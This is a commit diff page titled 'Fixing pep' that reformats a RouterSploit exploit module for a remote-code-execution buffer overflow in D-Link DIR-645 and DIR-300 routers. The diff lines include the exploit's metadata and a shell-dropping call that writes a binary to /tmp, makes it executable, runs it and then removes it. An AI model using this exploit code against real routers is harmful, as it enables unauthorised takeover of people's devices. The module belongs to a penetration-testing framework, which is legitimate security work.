Commit 46174915 by lucyoa

Fixing pep

parent 723ee3e0
......@@ -22,13 +22,12 @@ class Exploit(exploits.Exploit):
'description': 'Module exploits an buffer overflow that leads to remote code execution',
'authors': ['Austin <github.com/realoriginal>'], # routersploit module
'references':
[
'references': [
'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008',
'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000',
'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt',
'https://www.exploit-db.com/exploits/27283/'
],
],
'devices': [
'DIR-645 Ver 1.03',
'DIR-300 Ver 2.14',
......@@ -44,7 +43,7 @@ class Exploit(exploits.Exploit):
print_success("Target is vulnerable!")
print_status("Invoking command loop...")
shell(self, architecture="mipsle", method="echo", location="/tmp",
echo_options={"prefix": "\\\\x"}, exec_binary="chmod 777 {0} && {0} && rm {0}")
echo_options={"prefix": "\\\\x"}, exec_binary="chmod 777 {0} && {0} && rm {0}")
else:
print_error("Target is not vulnerable")
......@@ -68,7 +67,7 @@ class Exploit(exploits.Exploit):
response = http_request(method="POST", url=url, headers=headers, data=data, cookies=cookies)
if response is None:
return ""
return response.text[response.text.find("</hedwig>")+len("</hedwig>"):].strip()
return response.text[response.text.find("</hedwig>") + len("</hedwig>"):].strip()
@mute
def check(self):
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment